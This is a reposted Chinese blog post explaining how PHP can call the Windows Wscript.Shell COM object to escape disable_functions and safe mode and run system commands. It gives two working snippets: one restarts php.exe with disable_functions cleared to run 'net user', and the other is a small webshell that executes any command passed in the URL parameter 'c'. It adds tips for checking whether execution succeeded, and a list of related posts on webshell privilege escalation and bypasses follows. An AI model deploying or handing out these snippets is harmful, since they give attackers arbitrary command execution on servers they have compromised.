php利用wsh突破函数禁用执行命令(安全模式同理)

最新推荐文章于 2022-10-31 20:03:00 发布
转载 最新推荐文章于 2022-10-31 20:03:00 发布 · 183 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/hookjoy/p/4162186.html
文章标签:

#php #操作系统 #shell

本文介绍了一种在Windows服务器上使用PHP与WSH组件执行命令的方法,即使在某些命令被禁用的情况下也能实现。文章提供了两种突破代码示例,并解释了如何测试命令执行的成功与否。

很多时候有些windows的服务器是支持wsh组建的,但是却执行不了命令,asp下执行被拒绝,php下执行报错,此时你可以借鉴以下的方法尝试。

php利用wsh突破函数禁用执行命令(安全模式同理)
条件说明:

需要服务器是windows并支持wsh组建.且知道php安装目录
php在IIS环境下利用wsh执行命令是没有asp的权限高的。如果在apache环境下,apache默认都是system或administrator权限。


  测试是否可以执行命令的时候,如果回显空白,可以多尝试一些命令,比如set,whoami,等等,因为有时候有些命令被禁用的,比如net类或者ipconfig命令就经常被禁用。

 

 突破代码如下:

<?php
$cmd='net user';
$path = 'C:\\PHP\\php.exe';
$cmd='-r "system(\''.$cmd.'\');" -d disable_functions = ';

//重新定义disable_functions函数
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec($path.' '.$cmd);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo "${stroutput}\n";
?>

 或者:

<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");  
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");  
$stdout = $exec->StdOut();  
$stroutput = $stdout->ReadAll();  
echo $stroutput;  
?>

 

转载于:https://www.cnblogs.com/hookjoy/p/4162186.html

利用PHP扩展模块突破Disable_functions执行命令
09-13
利用PHP扩展模块突破Disable_functions执行命令
PHP COM组件调用绕过安全模式执行任意文件漏洞
03-03
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令。漏洞出现的原因是由于在安全模式下的PHP平台虽然system();pathru()函数被禁止,但是com。allow_dcom的设置依旧是为 true。以至于攻击者可以使用COM()函数创建系统组件对象来运行系统命令。如果是默认的Apache设置或者Web服务器以 Loacalsystem权限或Administrators权限运行,攻击者可以使用这个漏洞来提升权限。
php和asp利用Shell.Application来执行程序的代码
10-30
在讨论PHP和ASP脚本如何利用Windows的Shell.Application组件来执行外部程序时,首先需要了解Shell.Application对象。Shell.Application是Windows操作系统中的一部分,它提供了一种方式,通过编程来操作文件系统、...
利用WSH实现Oracle逻辑备份的自动执行.pdf
10-10
总的来说,利用WSH实现Oracle逻辑备份的自动执行,不仅可以提升备份的可靠性和实用性,还能有效节省数据库管理员的时间和精力,降低人为错误的风险。更重要的是,通过自动化的异地备份,可以极大地提高数据的安全性...
一段利用WSH修改和查看IP配置的代码
09-06
标题中的“一段利用WSH修改和查看IP配置的代码”是指使用Windows Script Host(WSH)来管理和显示计算机的IP配置信息。WSH是微软提供的一种技术,它允许脚本语言(如VBScript和JScript)与操作系统进行交互,执行...
一段利用WSH获取登录时间的jscript代码
10-30
### 一段利用WSH获取登录时间的jscript代码 在IT领域中,脚本语言的应用十分广泛,特别是在系统管理和自动化任务处理方面。本篇文章将基于提供的jscript代码,深入探讨如何利用Windows Script Host (WSH)...
wscript.shell被禁,执行命令方法
06-19
在IT领域,尤其是在Web开发与安全防护中,“wscript.shell被禁,执行命令方法”这一主题涉及到了一种绕过安全限制、执行系统级命令的技术手段。以下是对这一知识点的详细解析: ### wscript.shell简介 `wscript....
菜刀php提权,当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令...
weixin_39622399的博客
03-19 466
/*==============*/error_reporting(0);ini_set('max_execution_time',0);// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------/**************...
PHP安全编程之PHP安全模式
爱代码也爱生活
08-11 3575
PHP的safe_mode选项的目的是为了解决本小节前后所述的某些问题。但是,在PHP层面上去解决这类问题从架构上来看是不正确的,正如PHP手册所述(http://php.net/features.safe-mode)。 当安全模式生效时,PHP会对正在执行的脚本所读取(或所操作)文件的属主进行检查,以保证与该脚本的属主是相同的。虽然这样确实可以防范本章中的很多例子,但它不会影响其它语言编写
防止aspxspy木马列服务 iis信息 执行命令提权等操作
weixin_30471561的博客
02-27 133
环境:windows2003+iis6+.net2.0 处于安全考虑,对服务器安全进行设置。上传aspxspy测试。 ASPXSPY探针 1.禁止aspxspy木马执行命令提权 和读取注册表 测试方法一: 先打开:C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\config\web.config 之后找到 <trust level...
PHP调用外部程序的方法
热门推荐
whatday的专栏
02-05 1万+
PHP中调用外部命令,可以用如下三种方法来实现:   方法一:用PHP提供的专门函数(四个): PHP提供4个专门的执行外部命令的函数exec(), system(), passthru(), shell_exec() 1)exec() 原型: string exe( string $command [, array &$output [,
学习笔记-绕过php禁用函数
人饭子的博客
10-31 776
bypass_disable_function 相关文章 & Source & Reference CTF中的命令执行绕过 无需sendmail:巧用LD_PRELOAD突破disable_functions php函数禁用绕过的原理与利用 相关工具 Medicean/as_bypass_php_disable_functions yangyangwithgnu/byp...
phpinfo 命令执行函数禁用绕过tips
yggcwhat
06-02 1981
phpinfo 命令执行函数禁用绕过tips
PHP绕过disable_function限制
BerL1n
09-24 5242
前言 之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。 LD_PRELOAD环境变量突破 LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...
php wscript.shell run,php调用com 组件wscript.shell执行dos命令
weixin_35916239的博客
03-10 641
php调用com 组件wscript.shell执行dos命令/php调用com 组件wscript.shell执行dos命令p('');if ($execfunc=='wscript' && IS_WIN && IS_COM) {$wsh = new COM('WScript.shell');$exec = $wsh->exec('cmd.exe /c '....
[投稿]Webshell下命令执行限制及绕过方法
Coisini的博客
06-23 4238
0x00 前言 上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御. 0x01 php webshell执行命令原理 php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下 搜索关键字定位到以下代码 function execute($cfe) { $re...
探索WSH脚本宿主:安全与趣味兼具的Windows脚本
然而,因为其强大的执行能力,WSH也引入了安全风险,用户在使用时需要格外小心,避免执行不可信来源的脚本。 了解WSH和VBScript,对于提高工作效率和掌握Windows环境下的自动化技术都是非常有价值的。而针对它的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值